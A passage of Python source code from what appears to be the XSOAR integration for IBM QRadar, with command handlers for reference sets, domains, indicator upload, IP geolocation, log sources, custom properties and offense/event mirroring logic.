PORT (port number) or DATE.
- timeout_type: Indicates if the time_to_live interval is based on when the data was first seen or last seen.
The allowed values are 'FIRST_SEEN', 'LAST_SEEN' and 'UNKNOWN'. The default value is 'UNKNOWN'.
- time_to_live: The time to live interval, for example: '1 month' or '5 minutes'.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
element_type: str = args.get('element_type', '')
timeout_type = args.get('timeout_type')
time_to_live = args.get('time_to_live')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_set_create(ref_name, element_type, timeout_type, time_to_live, fields)
outputs = sanitize_outputs(response, REFERENCE_SETS_OLD_NEW_MAP)
headers = build_headers(['Name', 'ElementType', 'Data', 'TimeToLive', 'TimeoutType'],
set(REFERENCE_SETS_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Reference Set Create', outputs, headers, removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=outputs,
raw_response=response
)
def qradar_reference_set_delete_command(client: Client, args: Dict) -> CommandResults:
"""
Removes a reference set or purges its contents.
possible arguments:
    - ref_name (Required): The name of the reference set to delete or purge.
- purge_only: Indicates if the reference set should have its contents purged (true),
keeping the reference set structure. If the value is 'false',
                  or not specified, the reference set is removed completely.
Default is 'false'.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
purge_only = args.get('purge_only')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.reference_set_delete(ref_name, purge_only, fields)
return CommandResults(
raw_response=response,
readable_output=f'Request to delete reference {ref_name} was submitted.'
f''' Current deletion status: {response.get('status', 'Unknown')}''')
def qradar_reference_set_value_upsert_command(client: Client, args: Dict) -> CommandResults:
"""
Update or insert new value to a reference set from QRadar service.
possible arguments:
- ref_name (Required): The reference name to insert/update a value for.
    - value (Required): Comma separated list of all the values to be inserted/updated.
- source: An indication of where the data originated. Default is reference data api.
- date_value: Boolean, specifies if values given are dates or not.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
values: List[str] = argToList(args.get('value', ''))
if not values:
raise DemistoException('Value to insert must be given.')
source = args.get('source')
date_value = argToBoolean(args.get('date_value', False))
fields = args.get('fields')
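    # For date values, convert them to their epoch representation before upserting.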
if date_value:
values = [get_time_parameter(value, epoch_format=True) for value in values]
# if one of these calls fail, raise an error and stop command execution
if len(values) == 1:
response = client.reference_set_value_upsert(ref_name, values[0], source, fields)
else:
response = client.indicators_upload(ref_name, values, fields)
outputs = sanitize_outputs(response, REFERENCE_SETS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Reference Update Create', outputs,
['Name', 'ElementType', 'TimeToLive', 'TimeoutType', 'NumberOfElements',
'CreationTime'], removeNull=True),
outputs_prefix='QRadar.Reference',
outputs_key_field='Name',
outputs=outputs,
raw_response=response
)
def qradar_reference_set_value_delete_command(client: Client, args: Dict) -> CommandResults:
"""
Delete a value in reference set from QRadar service.
possible arguments:
    - ref_name (Required): The reference name to delete a value from.
    - value (Required): Value to be deleted.
    - date_value: Boolean, specifies if the value given is a date or not.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
value: str = args.get('value', '')
date_value = argToBoolean(args.get('date_value', False))
original_value = value
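    # For date values, delete by the epoch representation while keeping the original value for the output message.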
if date_value:
value = get_time_parameter(original_value, epoch_format=True)
# if this call fails, raise an error and stop command execution
response = client.reference_set_value_delete(ref_name, value)
human_readable = f'### value: {original_value} of reference: {ref_name} was deleted successfully'
return CommandResults(
readable_output=human_readable,
raw_response=response
)
def qradar_domains_list_command(client: Client, args: Dict) -> CommandResults:
"""
    Retrieves list of domains from QRadar service.
If you do not have the System Administrator or Security Administrator permissions,
then for each domain assigned to your security profile you can only view the values
for the id and name fields. All other values return null.
possible arguments:
- domain_id: Retrieves details of the specific domain that corresponds to the ID given.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
    # Backward compatibility: the domain_id argument was named 'id' in QRadar v2.
domain_id = args.get('domain_id') or args.get('id')
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.domains_list(domain_id, range_, filter_, fields)
outputs = sanitize_outputs(response, DOMAIN_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Domains List', outputs, removeNull=True),
outputs_prefix='QRadar.Domains',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_indicators_upload_command(client: Client, args: Dict) -> CommandResults:
"""
Uploads list of indicators from Demisto to a reference set in QRadar service.
possible arguments:
- ref_name (Required): Name of the reference set to upload indicators to.
- query: The query for getting indicators from Demisto.
- limit: Maximum number of indicators to fetch from Demisto.
- page: The page from which to get the indicators.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ref_name: str = args.get('ref_name', '')
query = args.get('query')
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT_VALUE))
page = arg_to_number(args.get('page', 0))
fields = args.get('fields')
    # Backward compatibility for the QRadar v2 command: create a reference set for the given 'ref_name' if it does not exist.
element_type = args.get('element_type', '')
timeout_type = args.get('timeout_type')
time_to_live = args.get('time_to_live')
try:
client.reference_sets_list(ref_name=ref_name)
except DemistoException as e:
        # Create the reference set if it does not exist
if e.message and f'{ref_name} does not exist' in e.message:
# if this call fails, raise an error and stop command execution
client.reference_set_create(ref_name, element_type, timeout_type, time_to_live)
else:
raise e
search_indicators = IndicatorsSearcher(page=page)
indicators = search_indicators.search_indicators_by_version(query=query, size=limit).get('iocs', [])
indicators_data = [{'Indicator Value': indicator.get('value'), 'Indicator Type': indicator.get('indicator_type')}
for indicator in indicators if 'value' in indicator and 'indicator_type' in indicator]
indicator_values: List[Any] = [indicator.get('Indicator Value') for indicator in indicators_data]
if not indicators_data:
return CommandResults(
readable_output=f'No indicators were found for reference set {ref_name}'
)
# if this call fails, raise an error and stop command execution
response = client.indicators_upload(ref_name, indicator_values, fields)
outputs = sanitize_outputs(response)
reference_set_hr = tableToMarkdown(f'Indicators Upload For Reference Set {ref_name}', outputs)
indicators_uploaded_hr = tableToMarkdown('Indicators Uploaded', indicators_data)
return CommandResults(
readable_output=f'{reference_set_hr}\n{indicators_uploaded_hr}',
outputs_prefix='QRadar.Reference',
outputs_key_field='name',
outputs=outputs,
raw_response=response
)
def flatten_nested_geolocation_values(geolocation_dict: Dict, dict_key: str, nested_value_keys: List[str]) -> Dict:
"""
Receives output from geolocation IPs command, and does:
1) flattens output, takes nested keys values.
2) Converts keys to prefix of 'dict_key' and suffix of nested key as camel case.
Args:
geolocation_dict (Dict): The dict to flatten.
        dict_key (str): The key of the inner dict whose values are used.
        nested_value_keys (List[str]): The keys inside the inner dict to take.
Returns:
        (Dict): Dict of {<camel case dict_key><camel case nested key>: <nested key value>}.
"""
return {f'{camelize_string(dict_key)}{camelize_string(k)}': geolocation_dict.get(dict_key, dict()).get(k) for k in
nested_value_keys}
def qradar_geolocations_for_ip_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves the MaxMind geoip data for the given IP addresses.
possible arguments:
- ip (Required): Comma separated list. the IPs to retrieve data for.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
ips = argToList(args.get('ip'))
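    # Build an 'ip_address IN (...)' filter from the given list of IPs.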
filter_ = f'''ip_address IN ({','.join(map(lambda ip: f'"{str(ip)}"', ips))})'''
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.geolocations_for_ip(filter_, fields)
outputs = []
for output in response:
city_values = flatten_nested_geolocation_values(output, 'city', ['name'])
continent_values = flatten_nested_geolocation_values(output, 'continent', ['name'])
location_values = flatten_nested_geolocation_values(output, 'location',
['accuracy_radius', 'average_income', 'latitude',
'longitude', 'metro_code', 'population_density',
'timezone'])
physical_country_values = flatten_nested_geolocation_values(output, 'physical_country', ['iso_code', 'name'])
registered_country_values = flatten_nested_geolocation_values(output, 'registered_country',
['iso_code', 'name'])
represented_country_values = flatten_nested_geolocation_values(output, 'represented_country',
['iso_code', 'name', 'confidence'])
subdivision_values = flatten_nested_geolocation_values(output, 'subdivision',
['name', 'iso_code', 'confidence'])
non_nested_values = {
'IPAddress': output.get('ip_address'),
'Traits': output.get('traits'),
'Coordinates': output.get('geo_json', dict()).get('coordinates'),
'PostalCode': output.get('postal', dict()).get('postal_code'),
'PostalCodeConfidence': output.get('postal', dict()).get('confidence')
}
final_output = dict(city_values, **continent_values, **location_values, **physical_country_values,
**registered_country_values, **represented_country_values, **subdivision_values,
**non_nested_values)
outputs.append(final_output)
final_outputs = sanitize_outputs(outputs)
return CommandResults(
readable_output=tableToMarkdown('Geolocation For IP', final_outputs),
outputs_prefix='QRadar.GeoForIP',
outputs_key_field='IPAddress',
outputs=final_outputs,
raw_response=response
)
def qradar_log_sources_list_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a list of log sources from QRadar service.
possible arguments:
    - qrd_encryption_algorithm: The algorithm to use for encrypting the sensitive data of this
        endpoint. Defaults to AES128.
- qrd_encryption_password: The password to use for encrypting the sensitive data of this endpoint.
If argument was not given, will be randomly generated.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
qrd_encryption_algorithm: str = args.get('qrd_encryption_algorithm', 'AES128')
qrd_encryption_password: str = args.get('qrd_encryption_password', secrets.token_urlsafe(20))
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_ = args.get('filter')
fields = args.get('fields')
# if this call fails, raise an error and stop command execution
response = client.log_sources_list(qrd_encryption_algorithm, qrd_encryption_password, range_, filter_, fields)
outputs = sanitize_outputs(response, LOG_SOURCES_OLD_NEW_MAP)
headers = build_headers(['ID', 'Name', 'Description'], set(LOG_SOURCES_OLD_NEW_MAP.values()))
return CommandResults(
readable_output=tableToMarkdown('Log Sources List', outputs, headers, removeNull=True),
outputs_prefix='QRadar.LogSource',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_get_custom_properties_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a list of event regex properties from QRadar service.
possible arguments:
    - field_name: A comma-separated list of exact property names to search for.
- range: Range of offenses to return (e.g.: 0-20, 3-5, 3-3).
- filter: Query filter to filter results returned by QRadar service. see
https://www.ibm.com/support/knowledgecenter/SS42VS_SHR/com.ibm.qradarapi.doc/c_rest_api_filtering.html
for more details.
- fields: If used, will filter all fields except for the specified ones.
Use this parameter to specify which fields you would like to get back in the
response. Fields that are not explicitly named are excluded.
Args:
client (Client): QRadar client to perform the API call.
args (Dict): Demisto args.
Returns:
CommandResults.
"""
limit = arg_to_number(args.get('limit', DEFAULT_LIMIT_VALUE))
if limit:
range_ = f'items=0-{limit - 1}'
else:
range_ = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
like_names = argToList(args.get('like_name'))
field_names = argToList(args.get('field_name'))
filter_ = args.get('filter', '')
fields = args.get('fields')
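    # When no explicit filter is given, build one from the exact field names and/or the ILIKE name patterns.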
if not filter_:
if field_names:
filter_ += f'''name IN ({','.join(map(lambda name: f'"{str(name)}"', field_names))})'''
if like_names:
filter_ += ' or '.join(map(lambda like: f' name ILIKE "%{like}%"', like_names))
# if this call fails, raise an error and stop command execution
response = client.custom_properties(range_, filter_, fields)
outputs = sanitize_outputs(response)
return CommandResults(
readable_output=tableToMarkdown('Custom Properties', outputs, removeNull=True),
outputs_prefix='QRadar.Properties',
outputs_key_field='identifier',
outputs=outputs,
raw_response=response
)
def perform_ips_command_request(client: Client, args: Dict[str, Any], is_destination_addresses: bool):
"""
Performs request to QRadar IPs endpoint.
Args:
client (Client): Client to perform the request to QRadar service.
args (Dict[str, Any]): XSOAR arguments.
is_destination_addresses (bool): Whether request is for destination addresses or source addresses.
Returns:
- Request response.
"""
range_: str = f'''items={args.get('range', DEFAULT_RANGE_VALUE)}'''
filter_: Optional[str] = args.get('filter')
fields: Optional[str] = args.get('fields')
address_type = 'local_destination' if is_destination_addresses else 'source'
ips_arg_name: str = f'{address_type}_ip'
ips: List[str] = argToList(args.get(ips_arg_name, []))
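    # An explicit filter and a list of IPs are mutually exclusive; a given list of IPs is turned into an OR filter.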
if ips and filter_:
raise DemistoException(f'Both filter and {ips_arg_name} have been supplied. Please supply only one.')
if ips:
filter_ = ' OR '.join([f'{ips_arg_name}="{ip_}"' for ip_ in ips])
url_suffix = f'{address_type}_addresses'
# if this call fails, raise an error and stop command execution
response = client.get_addresses(url_suffix, filter_, fields, range_)
return response
def qradar_ips_source_get_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
    Get source IPs from QRadar service.
    Args:
        client (Client): Client to perform API calls to QRadar service.
        args (Dict[str, Any]): XSOAR arguments.
Returns:
(CommandResults).
"""
response = perform_ips_command_request(client, args, is_destination_addresses=False)
outputs = sanitize_outputs(response, SOURCE_IPS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Source IPs', outputs),
outputs_prefix='QRadar.SourceIP',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_ips_local_destination_get_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
    Get local destination IPs from QRadar service.
    Args:
        client (Client): Client to perform API calls to QRadar service.
        args (Dict[str, Any]): XSOAR arguments.
Returns:
(CommandResults).
"""
response = perform_ips_command_request(client, args, is_destination_addresses=True)
outputs = sanitize_outputs(response, LOCAL_DESTINATION_IPS_OLD_NEW_MAP)
return CommandResults(
readable_output=tableToMarkdown('Local Destination IPs', outputs),
outputs_prefix='QRadar.LocalDestinationIP',
outputs_key_field='ID',
outputs=outputs,
raw_response=response
)
def qradar_reset_last_run_command() -> str:
"""
Puts the reset flag inside integration context.
Returns:
(str): 'fetch-incidents was reset successfully'.
"""
ctx = get_integration_context()
ctx[RESET_KEY] = True
set_to_integration_context_with_retries(ctx)
return 'fetch-incidents was reset successfully.'
def qradar_get_mapping_fields_command(client: Client) -> Dict:
"""
Returns Dict object containing the list of fields for an incident type.
This command should be used for debugging purposes.
Args:
client (Client): Client to perform API calls.
Returns:
(Dict): Contains all the mapping.
"""
offense = {
'username_count': 'int',
'description': 'str',
'rules': {
'id': 'int',
'type': 'str',
'name': 'str'
},
'event_count': 'int',
'flow_count': 'int',
'assigned_to': 'NoneType',
'security_category_count': 'int',
'follow_up': 'bool',
'source_address_ids': 'str',
'source_count': 'int',
'inactive': 'bool',
'protected': 'bool',
'closing_user': 'str',
'destination_networks': 'str',
'source_network': 'str',
'category_count': 'int',
'close_time': 'str',
'remote_destination_count': 'int',
'start_time': 'str',
'magnitude': 'int',
'last_updated_time': 'str',
'credibility': 'int',
'id': 'int',
'categories': 'str',
'severity': 'int',
'policy_category_count': 'int',
'closing_reason_id': 'str',
'device_count': 'int',
'offense_type': 'str',
'relevance': 'int',
'domain_id': 'int',
'offense_source': 'str',
'local_destination_address_ids': 'int',
'local_destination_count': 'int',
'status': 'str',
'domain_name': 'str'
}
events = {
'events': {
'qidname_qid': 'str',
'logsourcename_logsourceid': 'str',
'categoryname_highlevelcategory': 'str',
'categoryname_category': 'str',
'protocolname_protocolid': 'str',
'sourceip': 'str',
'sourceport': 'int',
'destinationip': 'str',
'destinationport': 'int',
'qiddescription_qid': 'str',
'username': 'NoneType',
'rulename_creeventlist': 'str',
'sourcegeographiclocation': 'str',
'sourceMAC': 'str',
'sourcev6': 'str',
'destinationgeographiclocation': 'str',
'destinationv6': 'str',
'logsourcetypename_devicetype': 'str',
'credibility': 'int',
'severity': 'int',
'magnitude': 'int',
'eventcount': 'int',
'eventDirection': 'str',
'postNatDestinationIP': 'str',
'postNatDestinationPort': 'int',
'postNatSourceIP': 'str',
'postNatSourcePort': 'int',
'preNatDestinationPort': 'int',
'preNatSourceIP': 'str',
'preNatSourcePort': 'int',
'utf8_payload': 'str',
'starttime': 'str',
'devicetime': 'int'
}
}
assets = {
'assets': {
'interfaces': {
'mac_address': 'str',
'ip_addresses': {
'type': 'str',
'value': 'str'
},
'id': 'int',
'Unified Name': 'str',
'Technical User': 'str',
'Switch ID': 'str',
'Business Contact': 'str',
'CVSS Availability Requirement': 'str',
'Compliance Notes': 'str',
'Primary OS ID': 'str',
'Compliance Plan': 'str',
'Switch Port ID': 'str',
'Weight': 'str',
'Location': 'str',
'CVSS Confidentiality Requirement': 'str',
'Technical Contact': 'str',
'Technical Owner': 'str',
'CVSS Collateral Damage Potential': 'str',
'Description': 'str',
'Business Owner': 'str',
'CVSS Integrity Requirement': 'str'
},
'id': 'int',
'domain_id': 'int',
'domain_name': 'str'
}
}
# if this call fails, raise an error and stop command execution
custom_fields = {
'events': {field.get('name'): field.get('property_type')
for field in client.custom_properties()
if 'name' in field and 'property_type' in field}
}
fields = {
'Offense': offense,
'Events: Builtin Fields': events,
'Events: Custom Fields': custom_fields,
'Assets': assets,
}
return fields
def update_events_mirror_message(mirror_options: Optional[Any], events_limit: int,
failure_message: str, events_count: int, events_mirrored: int) -> str:
"""Return the offense's events' mirror error message.
Args:
mirror_options (str): The mirror options for the instance.
events_limit (int): The events limit for the mirroring.
failure_message (str): A failure message if there was a failure during fetching of events.
events_count (int): The number of events in the offense.
events_mirrored (int): The number of events mirrored in the offense
Returns: (str) An updated offense events mirror message.
"""
mirroring_events_message = 'Unknown'
print_debug_msg(f"mirror_options {mirror_options}\n events_limit {events_limit} \n"
f"failure_message {failure_message}\n events_count {events_count}\n "
f"events_mirrored {events_mirrored}")
if mirror_options != MIRROR_OFFENSE_AND_EVENTS:
mirroring_events_message = ''
elif events_mirrored < min(events_count, events_limit) and failure_message:
mirroring_events_message = failure_message
elif events_mirrored == events_limit:
mirroring_events_message = 'Mirroring events has reached events limit in this incident.'
elif events_mirrored == events_count:
mirroring_events_message = 'All available events in the offense were mirrored.'
return mirroring_events_message
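# Illustrative sketch (not part of the integration, never called): how the message
# selection above resolves for two hypothetical inputs, assuming the instance is
# configured with the MIRROR_OFFENSE_AND_EVENTS mirror option.
def _example_update_events_mirror_message():
    # events limit reached: 20 of 100 events mirrored with a limit of 20
    limit_msg = update_events_mirror_message(MIRROR_OFFENSE_AND_EVENTS, events_limit=20, failure_message='',
                                             events_count=100, events_mirrored=20)
    # all events mirrored: 50 of 50 events mirrored with a limit of 100
    all_msg = update_events_mirror_message(MIRROR_OFFENSE_AND_EVENTS, events_limit=100, failure_message='',
                                           events_count=50, events_mirrored=50)
    return limit_msg, all_msg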
def json_loads_inner(json_dumps_list: List[str]) -> list:
""" Json load values of list.
Args:
json_dumps_list: A list with json dumps as nodes.
Returns: json loaded list of the json dumps in the original list.
"""
python_object_list = []
for json_dump in json_dumps_list:
try:
python_object_list.append(json.loads(json_dump))
except Exception as e:
demisto.error(f'Exception {e} when trying to json parse {json_dump}, as part of {json_dumps_list}')
raise e
return python_object_list
def json_dumps_inner(listed_objects: list) -> List[str]:
""" Json dump values of list.
Args:
listed_objects: A list with nodes to be json dumped.
Returns: json dumped list of the json dumps in the original list.
"""
listed_json_dumps = []
for python_object in listed_objects:
listed_json_dumps.append(json.dumps(python_object))
return listed_json_dumps
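# Illustrative sketch (not part of the integration, never called): json_dumps_inner and
# json_loads_inner are inverses of each other, used so that list nodes can be stored as
# JSON strings inside the integration context. The sample offenses are hypothetical.
def _example_json_round_trip():
    offenses = [{'id': 1, 'events': []}, {'id': 2, 'events': [{'qid': 100}]}]
    dumped = json_dumps_inner(offenses)  # ['{"id": 1, "events": []}', ...]
    assert json_loads_inner(dumped) == offenses
    return dumped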
def extract_context_data(context_data: dict, include_id: bool = False) -> dict:
"""Transform the context data from partially json encoded to fully decoded.
Args:
context_data: The context data.
include_id: Whether to include id in the encoding of the data.
Returns: The extracted context data.
"""
new_context_data = context_data.copy()
new_context_data.pop(LAST_FETCH_KEY, None)
if not new_context_data:
new_context_data = {}
new_context_data.update({
UPDATED_MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(
context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, '[]'))),
MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(context_data.get(MIRRORED_OFFENSES_CTX_KEY, '[]'))),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: json_loads_inner(json.loads(
context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, '[]'))),
'samples': json_loads_inner(json.loads(context_data.get('samples', '[]'))),
'last_mirror_update': json.loads(context_data.get('last_mirror_update', '0'))
})
if include_id and LAST_FETCH_KEY in context_data:
new_context_data.update({LAST_FETCH_KEY: int(json.loads(context_data.get(LAST_FETCH_KEY, '0')))})
return new_context_data
def encode_context_data(context_data: dict, include_id: bool = False) -> dict:
"""Transform the context data from a decoded python object form to a partially json encoded form.
This is done in order to maintain compatibility with the set_to_integration_context_with_retries command.
Args:
context_data: The context data in its decoded python object form
include_id: Whether to include id in the encoding of the data.
Returns: The context data in its partially json encoded form.
"""
new_context_data = context_data.copy()
new_context_data.pop('retry_compatible', None)
new_context_data.pop(LAST_FETCH_KEY, None)
new_context_data.pop(RESET_KEY, None)
new_context_data.update({
UPDATED_MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])),
MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])),
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: json_dumps_inner(context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY,
[])),
'samples': json_dumps_inner(context_data.get('samples', [])),
'last_mirror_update': str(context_data.get('last_mirror_update', 0))
})
if include_id and LAST_FETCH_KEY in context_data:
new_context_data.update({LAST_FETCH_KEY: int(context_data.get(LAST_FETCH_KEY, 0))})
return new_context_data
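# Illustrative sketch (not part of the integration, never called): the decoded (python
# object) form of the context data versus the partially JSON-encoded form produced by
# encode_context_data. Keys reference the module constants; the values are hypothetical.
def _example_context_data_encoding():
    decoded = {
        MIRRORED_OFFENSES_CTX_KEY: [{'id': 1}],
        UPDATED_MIRRORED_OFFENSES_CTX_KEY: [],
        RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY: [],
        'samples': [],
        'last_mirror_update': 1600000000000,
    }
    encoded = encode_context_data(decoded)
    # every list node is now a JSON string and last_mirror_update is a str, e.g.
    # encoded[MIRRORED_OFFENSES_CTX_KEY] == ['{"id": 1}']
    return encoded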
@safely_update_context_data
def remove_offense_from_context_data(context_data: dict, version: Any, offense_id: str,
offense_to_remove: str) -> Tuple[dict, Any, dict]:
"""Remove an offense from context data UPDATED_MIRRORED_OFFENSES_CTX_KEY and RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY.
Args:
context_data: The context data to update.
version: The version of the context data to update.
offense_id: The offense id to remove from RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY.
offense_to_remove: The offense to remove from UPDATED_MIRRORED_OFFENSES_CTX_KEY.
    Returns: (The encoded new context_data, the context_data version the change was based on, the new decoded context_data)
"""
updated = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
resubmitted = context_data.get(RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY, [])
if offense_to_remove and offense_to_remove in updated:
updated.remove(offense_to_remove)
if offense_id in resubmitted:
resubmitted.remove(offense_id)
context_data[RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY] = resubmitted
context_data[UPDATED_MIRRORED_OFFENSES_CTX_KEY] = updated
return encode_context_data(context_data), version, context_data
def get_remote_data_command(client: Client, params: Dict[str, Any], args: Dict) -> GetRemoteDataResponse:
"""
get-remote-data command: Returns an updated incident and entries
    If the offense's events were updated in the long-running container, update the Demisto incident.
Args:
client (Client): QRadar client to perform the API calls.
params (Dict): Demisto params.
args (Dict):
id: Offense id to retrieve.
            lastUpdate: The last time data was retrieved, in epoch format.
Returns:
GetRemoteDataResponse.
"""
print_debug_msg("Started GetRemoteData")
remote_args = GetRemoteDataArgs(args)
ip_enrich, asset_enrich = get_offense_enrichment(params.get('enrichment', 'IPs And Assets'))
offense_id = remote_args.remote_incident_id
# if this call fails, raise an error and stop command execution
offense = client.offenses_list(offense_id=offense_id)
offense_last_update = get_time_parameter(offense.get('last_persisted_time'))
mirror_options = params.get('mirror_options')
raw_context, context_version = get_integration_context_with_version()
context_data = extract_context_data(raw_context.copy())
events_limit = int(params.get('events_limit') or DEFAULT_EVENTS_LIMIT)
processed_offenses = print_mirror_events_stats(context_data, f"Starting Get Remote Data For "
f"Offense {str(offense.get('id'))}")
    # compatibility for versions below 6.1
last_update = get_time_parameter(args.get('lastUpdate'))
if last_update and last_update > offense_last_update and str(offense.get("id")) not in processed_offenses:
demisto.debug('Nothing new in the ticket')
return GetRemoteDataResponse({'id': offense_id, 'mirroring_events_message': 'Nothing new in the ticket.'}, [])
demisto.debug(f'Updating offense. Offense last update was {offense_last_update}')
entries = []
if offense.get('status') == 'CLOSED' and argToBoolean(params.get('close_incident', False)):
demisto.debug(f'Offense is closed: {offense}')
try:
if closing_reason := offense.get('closing_reason_id', ''):
closing_reason = client.closing_reasons_list(closing_reason).get('text')
offense_close_time = offense.get('close_time', '')
closed_offense_notes = client.offense_notes_list(offense_id, f'items={DEFAULT_RANGE_VALUE}',
filter_=f'create_time >= {offense_close_time}')
            # In the QRadar UI, closing an offense adds a note with the closing reason and more details. Try to get that note
            # if it exists, else fall back to the closing reason only, as closing an offense through an API call does not create a note.
close_reason_with_note = next((note.get('note_text') for note in closed_offense_notes if
note.get('note_text').startswith('This offense was closed with reason:')),
closing_reason)
if not close_reason_with_note:
print_debug_msg(f'Could not find closing reason or closing note for offense with offense id {offense_id}')
close_reason_with_note = 'Unknown closing reason from QRadar'
else:
close_reason_with_note = f'From QRadar: {close_reason_with_note}'
except Exception as e:
demisto.error(f'Failed to get closing reason with error: {e}')
close_reason_with_note = 'Unknown closing reason from QRadar'
entries.append({
'Type': EntryType.NOTE,
'Contents': {
'dbotIncidentClose': True,
'closeReason': close_reason_with_note
},
'ContentsFormat': EntryFormat.JSON
})
failure_message = 'Failed communicating with long running container.'
if mirror_options == MIRROR_OFFENSE_AND_EVENTS:
offenses_waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
max_retries = min(MAX_FETCH_EVENT_RETIRES * (len(offenses_waiting_for_update) + 3), 20)
offense_to_remove = None
is_waiting_to_be_updated = True
evented_offense = None
retries = 0
while ((not evented_offense) or is_waiting_to_be_updated) and retries < max_retries:
if retries != 0:
time.sleep(FAILURE_SLEEP)
raw_context, context_version = get_integration_context_with_version()
context_data = extract_context_data(raw_context.copy())
print_mirror_events_stats(context_data, f"Get Remote Data Loop for id {offense.get('id')}, retry {retries}")
retries += 1
offenses_with_updated_events = context_data.get(UPDATED_MIRRORED_OFFENSES_CTX_KEY, [])
offenses_waiting_for_update = context_data.get(MIRRORED_OFFENSES_CTX_KEY, [])
evented_offense = [evented_offense for evented_offense in offenses_with_updated_events
if str(evented_offense.get('id')) == str(offense.get("id"))]
is_waiting_to_be_updated = any([True for waiting_offense in offenses_waiting_for_update
if str(waiting_offense.get('id')) == str(offense.get("id"))])
if evented_offense:
demisto.debug(f"Mirror Events: Offense {offense.get('id')} events were updated, updating incident.")
if evented_offense[0].get('events'):
offense['events'] = evented_offense[0].get('events')
failure_message = evented_offense[0].get('mirroring_events_message', '')
demisto.debug(f"Mirror Events: Offense {offense.get('id')} now has {len(offense.get('events'))} "
f"fetched events. Mirror message: {failure_message}")
offense_to_remove = evented_offense[0]
elif is_waiting_to_be_updated:
failure_message = 'In queue.'
new_context_data = remove_offense_from_context_data(offense_id=offense_id, offense_to_remove=offense_to_remove,
version=context_version,
context_data=context_data)
print_mirror_events_stats(new_context_data, f"Get Remote Data End for id {offense.get('id')}")
enriched_offense = enrich_offenses_result(client, offense, ip_enrich, asset_enrich)
final_offense_data = sanitize_outputs(enriched_offense)[0]
events_message = update_events_mirror_message(
mirror_options=mirror_options,
events_limit=events_limit,
failure_message=failure_message,
